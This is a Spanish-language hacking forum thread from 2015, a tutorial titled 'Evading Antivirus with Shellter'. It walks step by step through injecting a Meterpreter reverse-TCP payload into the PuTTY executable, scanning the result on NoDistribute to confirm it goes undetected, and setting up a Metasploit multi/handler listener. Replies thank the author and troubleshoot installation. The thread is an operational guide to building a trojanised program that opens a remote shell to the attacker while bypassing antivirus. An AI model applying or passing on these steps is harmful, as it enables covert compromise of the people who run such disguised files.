Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: LionSec en Julio 13, 2015, 04:32:00 PM

Título: Evadiendo Antivirus con Shellter
Publicado por: LionSec en Julio 13, 2015, 04:32:00 PM
Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación .

Para más información visita : shellterproject.com (http://shellterproject.com).

Instalación

Lo primero que haremos es descargarlo desde su página oficial (https://www.shellterproject.com/download/ (https://www.shellterproject.com/download/)) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

Código (bash) [Seleccionar]
apt-get update
apt-get install shellter

Instalación en backbox

Primero hay que agregar los repositorios :

Código (bash) [Seleccionar]
nano /etc/apt/sources.list

Añadimos las siguientes entradas :

deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main


Código (bash) [Seleccionar]
apt-get update
apt-get install shellter


Instalación en Arch Linux :

Código (bash) [Seleccionar]
yaourt -Syy
yaourt -S aur/shellter



En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A) .

(http://lionsec.net/blog/wp-content/uploads/2015/07/shellter1.png)

Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .

(http://lionsec.net/blog/wp-content/uploads/2015/07/shellter2.png)

Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurarlo manualmente .

Vamos a teclear (L)

(http://lionsec.net/blog/wp-content/uploads/2015/07/shellter3.png)

Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .

(http://lionsec.net/blog/wp-content/uploads/2015/07/shellter4.png)

Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado

(http://lionsec.net/blog/wp-content/uploads/2015/07/no1.png)
(http://lionsec.net/blog/wp-content/uploads/2015/07/no2.png)

:) :)

OK , sólo nos queda configurar el "listener" .

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit


(http://lionsec.net/blog/wp-content/uploads/2015/07/metasploit1.png)

En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .

(http://lionsec.net/blog/wp-content/uploads/2015/07/metasploit2.png)

Demo


Bueno amigos , eso ha sido todo . Espero que le sirva a más de uno .

Fuente : http://lionsec.net/blog/evadiendo-antivirus-con-shellter/ (http://lionsec.net/blog/evadiendo-antivirus-con-shellter/)


Saludos
Título: Re:Evadiendo Antivirus con Shellter
Publicado por: Vector en Julio 13, 2015, 10:10:41 PM
excelente aporte @LionSec (https://underc0de.org/foro/index.php?action=profile;u=39260) probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Título: Re:Evadiendo Antivirus con Shellter
Publicado por: LionSec en Julio 14, 2015, 03:28:16 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
excelente aporte @LionSec (https://underc0de.org/foro/index.php?action=profile;u=39260) probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Gracias @Vector (https://underc0de.org/foro/index.php?action=profile;u=47830) , espero que te sirva
Título: Re:Evadiendo Antivirus con Shellter
Publicado por: gr0ny en Julio 29, 2015, 07:53:46 PM
Hola buenas tardes, primero que todo muy buen aporte; muchas gracias.
Tengo un problema:
- Cuando llego a la parte de seleccionar los payloads no se muestra ninguno, queda en Select payload... Pero no se muestra ningun payload a seleccionar.
Me podrian ayudar por fa?

Gracias
Título: Re:Evadiendo Antivirus con Shellter
Publicado por: Vector en Agosto 30, 2015, 12:31:00 PM
Hola @gr0ny (https://underc0de.org/foro/index.php?action=profile;u=48925), mmm que OS usas??, yo usé Kali v1 y funcionó perfecto, eso si que tube que instalar el Wine, y eso que no se muestren los payloads... prueba iniciando la DB con #service postgresql start y prueba el shellter.

documentacion de kali: http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
espero por ayudarte.

Saludos.
Vector  ;D
Título: Re:Evadiendo Antivirus con Shellter
Publicado por: - ALEAJANDRO - en Octubre 17, 2015, 08:46:39 PM
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe
Título: Re:Evadiendo Antivirus con Shellter
Publicado por: zupa en Octubre 19, 2015, 01:29:06 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Se mas especifico para poder ayudarte, que tipo de error te da.